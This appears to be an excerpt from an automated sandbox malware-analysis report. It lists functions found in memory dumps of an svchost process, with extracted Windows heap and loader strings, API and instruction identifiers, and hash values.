                                                                                        • Opcode Fuzzy Hash: 3ed076a424539625d5a9f014418438c1ed4b9f24f84d16645ae1d83e39fcea10
                                                                                        • Instruction Fuzzy Hash: 7F51DD75A04749DFDB24EFE8C48479DBBB1BB48318F284499EC01EF291D774A889CB81
                                                                                        Function 038276B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                        • API String ID: 0-3061284088
                                                                                        • Opcode ID: 441b0d4c85508fb5292f2ce44ae9de78cc13341e3c9fb6ba946518a3218f904f
                                                                                        • Instruction ID: feb434a2fa0ad692a4868e8ab6c0e3bc10f80b983e505a7e4291f8910a28ba1f
                                                                                        • Opcode Fuzzy Hash: 441b0d4c85508fb5292f2ce44ae9de78cc13341e3c9fb6ba946518a3218f904f
                                                                                        • Instruction Fuzzy Hash: CE012D36149660EED227F3DDD809F56BBD4DF42A70F1840C9F010CB692DA9858C1C521
                                                                                        Function 038470C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                        • API String ID: 0-3178619729
                                                                                        • Opcode ID: a3c1bf1d9491be15770d7301c83e21add7a24d1d6bb7949d586c3405b032416e
                                                                                        • Instruction ID: 8b815e310aeae3f98791fa2a65f158279ea05b7e4830fb72ddc1d593a91d7a9c
                                                                                        • Opcode Fuzzy Hash: a3c1bf1d9491be15770d7301c83e21add7a24d1d6bb7949d586c3405b032416e
                                                                                        • Instruction Fuzzy Hash: FB139C70A00659DFDB25CFA8C4807A9FBF1BF49304F1881E9E859EBB81D735A945CB90
                                                                                        Function 03841070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                        • API String ID: 0-3570731704
                                                                                        • Opcode ID: 679a7e841c85b9ed7493aff6c818fd6c9cc3243eb8ed80deafcaf810dbf53a1f
                                                                                        • Instruction ID: c80a15babd73741442a89e34e84de45f38a01be09ed50ebd0d4d585bcba70acc
                                                                                        • Opcode Fuzzy Hash: 679a7e841c85b9ed7493aff6c818fd6c9cc3243eb8ed80deafcaf810dbf53a1f
                                                                                        • Instruction Fuzzy Hash: 7E924975A0022CCFEB25CFA8C844BA9B7B5BF45314F1981EAD949EB640D7349E80CF51
                                                                                        Function 0384A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03897D03
                                                                                        • SsHd, xrefs: 0384A885
                                                                                        • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03897D56
                                                                                        • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03897D39
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                        • API String ID: 0-2905229100
                                                                                        • Opcode ID: b812f4ecbb00f3b6b1e2e30fbc604d70db3ad4eb3eccc09e600b825806b7c060
                                                                                        • Instruction ID: 7ef23d96d2289585696f8433f11b6594b2f6518792fd41a77bc1acf28e8de7c0
                                                                                        • Opcode Fuzzy Hash: b812f4ecbb00f3b6b1e2e30fbc604d70db3ad4eb3eccc09e600b825806b7c060
                                                                                        • Instruction Fuzzy Hash: 96D18A35A402199BDF28CFE8C880AADFBB5BF58314F1940AAE855EF745D335D880CB91
                                                                                        Function 03843D40 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                        • API String ID: 0-3178619729
                                                                                        • Opcode ID: 8cca78843c7bec172617b4e1b62fd5ad467b097863f39206cf403ace8f9ba30e
                                                                                        • Instruction ID: 45297b46ab601e970cb0b2b8087f8f0886e08631cd40b2bec102a7753f54683e
                                                                                        • Opcode Fuzzy Hash: 8cca78843c7bec172617b4e1b62fd5ad467b097863f39206cf403ace8f9ba30e
                                                                                        • Instruction Fuzzy Hash: E7E2AE74A006199FDB24CFA9C490BA9FBF1FF49304F1881E9D849EBB85D774A845CB90
                                                                                        Function 0383A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                        • API String ID: 0-379654539
                                                                                        • Opcode ID: fd742d8be400844574c48b281356b5a7da3296c4d82b6989a5d490905d4ebaa2
                                                                                        • Instruction ID: 7c3eaf74c240a45e1a305e0bd1cac37b988ba894ecbec2a4ab80284584cd7aee
                                                                                        • Opcode Fuzzy Hash: fd742d8be400844574c48b281356b5a7da3296c4d82b6989a5d490905d4ebaa2
                                                                                        • Instruction Fuzzy Hash: 62C16D7410838A9FD719DF98C044B6AB7E4BF85708F0849AAF8D5CB350E739CA45CB92
                                                                                        Function 03840C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • HEAP[%wZ]: , xrefs: 038954D1, 03895592
                                                                                        • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 038955AE
                                                                                        • HEAP: , xrefs: 038954E0, 038955A1
                                                                                        • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 038954ED
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                        • API String ID: 0-1657114761
                                                                                        • Opcode ID: 213cb4b7e00f93c8ff68ccc10dd97a8c8019bfacd29b11208904aeaabf77eeba
                                                                                        • Instruction ID: e81ac858e2f237d177c9a41fcd7ce8e9e149b54b85b9545da924b2d492b5186b
                                                                                        • Opcode Fuzzy Hash: 213cb4b7e00f93c8ff68ccc10dd97a8c8019bfacd29b11208904aeaabf77eeba
                                                                                        • Instruction Fuzzy Hash: 73A1F2B460460DDFDB25DFA8C840B7BFBA5AF45304F1885EAD596CBB82D334A844CB91
                                                                                        Function 0386273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 038A22B6
                                                                                        • SXS: %s() passed the empty activation context, xrefs: 038A21DE
                                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 038A21D9, 038A22B1
                                                                                        • .Local, xrefs: 038628D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                        • API String ID: 0-1239276146
                                                                                        • Opcode ID: d7c76e5ffb0a1253f655a20c641c3ba784523250f7adfe0df332812eea00f034
                                                                                        • Instruction ID: 9555f081bbeb4ba50c58fbdaec59745f9c0fdf8a960afbcac083ff1233bcc234
                                                                                        • Opcode Fuzzy Hash: d7c76e5ffb0a1253f655a20c641c3ba784523250f7adfe0df332812eea00f034
                                                                                        • Instruction Fuzzy Hash: 58A18F3590122D9BDB34DFA8DC84BA9B3B5BF58314F1949E9D848EB251D7309E80CF91
                                                                                        Function 0382F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                        • API String ID: 0-2586055223
                                                                                        • Opcode ID: eae6d72b24ce9fd1440a0ea6518436aa30dff28f520726e25dbaa71c5cba1f72
                                                                                        • Instruction ID: 0e243d983299ecd937ff39f2b95be348e0c83e1afa284048358d514d6b1ab869
                                                                                        • Opcode Fuzzy Hash: eae6d72b24ce9fd1440a0ea6518436aa30dff28f520726e25dbaa71c5cba1f72
                                                                                        • Instruction Fuzzy Hash: 5E610576205784AFD721EBA8C844F67BBE9EF80714F0804E8FA55CB291D734E941CB62
                                                                                        Function 038E11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                        • API String ID: 0-336120773
                                                                                        • Opcode ID: 0b1f6ba465f111d8639401fbdfc92f87f67bc7a86dc7653bb7d816ce3c033529
                                                                                        • Instruction ID: 95e4e9b07188df4c79b6148d4d11971e06b4c70455c610505b289876ffd5cd80
                                                                                        • Opcode Fuzzy Hash: 0b1f6ba465f111d8639401fbdfc92f87f67bc7a86dc7653bb7d816ce3c033529
                                                                                        • Instruction Fuzzy Hash: 4D310176200214EFC752DBE8CC89F6AB7E8EF06664F1800D5F451CB291E670EC80CA66
                                                                                        Function 03829148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                        • API String ID: 0-1391187441
                                                                                        • Opcode ID: ad046706bdbe24c422725c1f016655107b9b8d4633238d333211eda03610238a
                                                                                        • Instruction ID: bbec31347abfab640ce93706d2b09145f0dfee5472da1e61b69f1d324131d037
                                                                                        • Opcode Fuzzy Hash: ad046706bdbe24c422725c1f016655107b9b8d4633238d333211eda03610238a
                                                                                        • Instruction Fuzzy Hash: F0318336601214EFCB12EBDACC85F9EBBB9EF45620F1440D5E814EB291D774ED80CA61
                                                                                        Function 038429A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • HEAP[%wZ]: , xrefs: 03843255
                                                                                        • HEAP: , xrefs: 03843264
                                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0384327D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                        • API String ID: 0-617086771
                                                                                        • Opcode ID: 62fe9d3f17b8b43d60d5b09812868eb40db4c4d1d9bfef89df42b079faae27ad
                                                                                        • Instruction ID: 39e5fe470fe2166a9c8e0e3556d5a8ec7ac7ba442173dd916bc58c1629b14f84
                                                                                        • Opcode Fuzzy Hash: 62fe9d3f17b8b43d60d5b09812868eb40db4c4d1d9bfef89df42b079faae27ad
                                                                                        • Instruction Fuzzy Hash: 9292BC75A082489FDB25CFA8C4407AEBBF1FF48304F188499E899EBB91D775A941CF50
                                                                                        Function 03841F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                        • API String ID: 0-3178619729
                                                                                        • Opcode ID: 9c519680aedaa51727ab4cf1cddddcc49c31cc0ab9f4a4abcbc9c439b729478a
                                                                                        • Instruction ID: 20d262d0a2de1bcae4313f25955e66c514704d06b844a9cf1089d7813fa4913f
                                                                                        • Opcode Fuzzy Hash: 9c519680aedaa51727ab4cf1cddddcc49c31cc0ab9f4a4abcbc9c439b729478a
                                                                                        • Instruction Fuzzy Hash: 1E22EC70604609AFEB16CFA8C494B7AFBB5EF06704F1C84DAE455CB682E735E881CB50
                                                                                        Function 03840770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                        • API String ID: 0-4253913091
                                                                                        • Opcode ID: a9b73e12afc4c0cdf04bac7613d829e779b942037b8c8a775a45824d30230032
                                                                                        • Instruction ID: 094290c66ee96f336c73f4345e7f0b84c3e9cf96ad44849931d19766103addf5
                                                                                        • Opcode Fuzzy Hash: a9b73e12afc4c0cdf04bac7613d829e779b942037b8c8a775a45824d30230032
                                                                                        • Instruction Fuzzy Hash: F0F1A9B4A00609DFEB25CFA8C980B6AF7B5FB45304F1881E9E516DB781D734E981CB91
                                                                                        Function 03831460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03831728
                                                                                        • HEAP[%wZ]: , xrefs: 03831712
                                                                                        • HEAP: , xrefs: 03831596
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                        • API String ID: 0-3178619729
                                                                                        • Opcode ID: 08cedbb933e15c9d7e6e62cd7b11981a1960cd18c730ae2a4cac557fa655ebb6
                                                                                        • Instruction ID: a0aaff67d8b881d2474c73062b2ad1c70d70707873dba96b11743af2eb890f3f
                                                                                        • Opcode Fuzzy Hash: 08cedbb933e15c9d7e6e62cd7b11981a1960cd18c730ae2a4cac557fa655ebb6
                                                                                        • Instruction Fuzzy Hash: 11E12130A046459FDB29EFA8C484B7ABBF5AF46704F1884DDE596CB345E734E940CB90
                                                                                        Function 0383B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                        • API String ID: 0-1145731471
                                                                                        • Opcode ID: 459611d205bcd51f582ad16bc246fb5ff3e60d9cc25e9653526f29a308520dba
                                                                                        • Instruction ID: 37da8818d30b8f64c5be0a237ed9c04d53c0a73bfa101802e6d58a1d44851c11
                                                                                        • Opcode Fuzzy Hash: 459611d205bcd51f582ad16bc246fb5ff3e60d9cc25e9653526f29a308520dba
                                                                                        • Instruction Fuzzy Hash: 0FB18EB9A056489BDF26CFD9C880BADB7B6EF45714F1845EAE851EB380D770E840CB50
                                                                                        Function 038B368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                        • API String ID: 0-2391371766
                                                                                        • Opcode ID: 357af5b51f4f2da2fa2968be1468ccca23aa58ff2bd157aa4c6ed6d3c9031868
                                                                                        • Instruction ID: 03576fd522a7bf0387759c70085241aad515bf99e3d95cd337e1bf12585ea679
                                                                                        • Opcode Fuzzy Hash: 357af5b51f4f2da2fa2968be1468ccca23aa58ff2bd157aa4c6ed6d3c9031868
                                                                                        • Instruction Fuzzy Hash: CEB18079604746EFD321DE98C880BABB7F8EB45714F1549A9FA50DB350D7B0E804CB92
                                                                                        Function 004025C0 Relevance: 4.0, Strings: 3, Instructions: 283COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: VUUU$VUUU$gfff
                                                                                        • API String ID: 0-2314002932
                                                                                        • Opcode ID: a786206704a4c73ccc5653bb8898c7f258e46ed527ae1a95b09c85026094a1ba
                                                                                        • Instruction ID: a384bd9cfbe211cfb2bc78efb560ac69642867dddff00d1deddb8e19d570a0f7
                                                                                        • Opcode Fuzzy Hash: a786206704a4c73ccc5653bb8898c7f258e46ed527ae1a95b09c85026094a1ba
                                                                                        • Instruction Fuzzy Hash: A5812836B005064BDB1C8D5DCE9827AB396EBD4315F18823BD90ADF3C1EAB9ED158784
                                                                                        Function 03856962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $@
                                                                                        • API String ID: 0-1077428164
                                                                                        • Opcode ID: d6643d697b0a85757377b0ae2d99f79bb8137a8a6e94d50d1842e14666c0be35
                                                                                        • Instruction ID: ceb596b82dfe4678df5dc4ad1325d281ca723a578f655ed19b7a6f8b986d8867
                                                                                        • Opcode Fuzzy Hash: d6643d697b0a85757377b0ae2d99f79bb8137a8a6e94d50d1842e14666c0be35
                                                                                        • Instruction Fuzzy Hash: FAC283716083459FEB25CFA8C840BABB7E5AF88754F0889ADFD89D7240E735D805CB52
                                                                                        Function 0382A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                                        • API String ID: 0-2779062949
                                                                                        • Opcode ID: dd37300c7ec4c5c3c06d49c07e4e24424c2295d25b905aa5cde727cf6668d4bb
                                                                                        • Instruction ID: 7ba8e65e027325a223891a186ec80d599dbff85d2649cfe744fb19d6bf7c83cb
                                                                                        • Opcode Fuzzy Hash: dd37300c7ec4c5c3c06d49c07e4e24424c2295d25b905aa5cde727cf6668d4bb
                                                                                        • Instruction Fuzzy Hash: 9BA15B759116299BDB21EFA4CC88BAAF7B8EF44700F1401EAE909EB250D7359EC5CF50
                                                                                        Function 038C36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                        • API String ID: 0-318774311
                                                                                        • Opcode ID: 76fe4e6979f6ae6eecf0ebe049461b5005daf417d73111f2e19988f564e5cc60
                                                                                        • Instruction ID: c6236d9524e21318caa80846c6a1316e1a32d180a92b71a9f77da63a0a2c9d32
                                                                                        • Opcode Fuzzy Hash: 76fe4e6979f6ae6eecf0ebe049461b5005daf417d73111f2e19988f564e5cc60
                                                                                        • Instruction Fuzzy Hash: 0881CE79618384AFD311DB98C844B6AB7E8FF85754F0889ADF980DB390D7B8D805CB52
                                                                                        Function 0386909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: %$&$@
                                                                                        • API String ID: 0-1537733988
                                                                                        • Opcode ID: ca3c3cb16a9cdd38054cf8734fb0918ae1fa79843b3c2af08b9ef35a9a9ea47c
                                                                                        • Instruction ID: fff45813672bb968ea57cd1d64587496fe12ff61f9441b6f4fcc5906ddb5da98
                                                                                        • Opcode Fuzzy Hash: ca3c3cb16a9cdd38054cf8734fb0918ae1fa79843b3c2af08b9ef35a9a9ea47c
                                                                                        • Instruction Fuzzy Hash: FD71C0745087059FD710DFA8C580A2BFBE9BFC5618F24499DE4AACB291D730D905CB93
                                                                                        Function 0390B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • GlobalizationUserSettings, xrefs: 0390B834
                                                                                        • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0390B82A
                                                                                        • TargetNtPath, xrefs: 0390B82F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                        • API String ID: 0-505981995
                                                                                        • Opcode ID: d41c1d594560a0ce3fa472646079bd13315512ea8a4816f84350ef0cacdf5b2c
                                                                                        • Instruction ID: 09f02f7c220ba3a51d1b90cc0a2c7739d01074c575b4f613c7b5557bc2c2094c
                                                                                        • Opcode Fuzzy Hash: d41c1d594560a0ce3fa472646079bd13315512ea8a4816f84350ef0cacdf5b2c
                                                                                        • Instruction Fuzzy Hash: 2461707694162DAFDB21DF98DC88B99B7B8AF04754F0101E5A518AB290D774DE80CF90
                                                                                        Function 0382F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • HEAP[%wZ]: , xrefs: 0388E6A6
                                                                                        • HEAP: , xrefs: 0388E6B3
                                                                                        • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0388E6C6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                        • API String ID: 0-1340214556
                                                                                        • Opcode ID: eabf41d5016dba4903c17f01cb6e2ad622e280915a1ed3d041b1428c4531c093
                                                                                        • Instruction ID: 2cfd87f890987b1ffd98440ea9f76d05b89efea49445ccce6fbe6d03000fb375
                                                                                        • Opcode Fuzzy Hash: eabf41d5016dba4903c17f01cb6e2ad622e280915a1ed3d041b1428c4531c093
                                                                                        • Instruction Fuzzy Hash: 0D51C335604758EFD722EBE8C844B6AFBF8AF05304F0800E4EA51DB692D774E950CB11
                                                                                        Function 038DDAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • HEAP[%wZ]: , xrefs: 038DDC12
                                                                                        • HEAP: , xrefs: 038DDC1F
                                                                                        • Heap block at %p modified at %p past requested size of %Ix, xrefs: 038DDC32
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
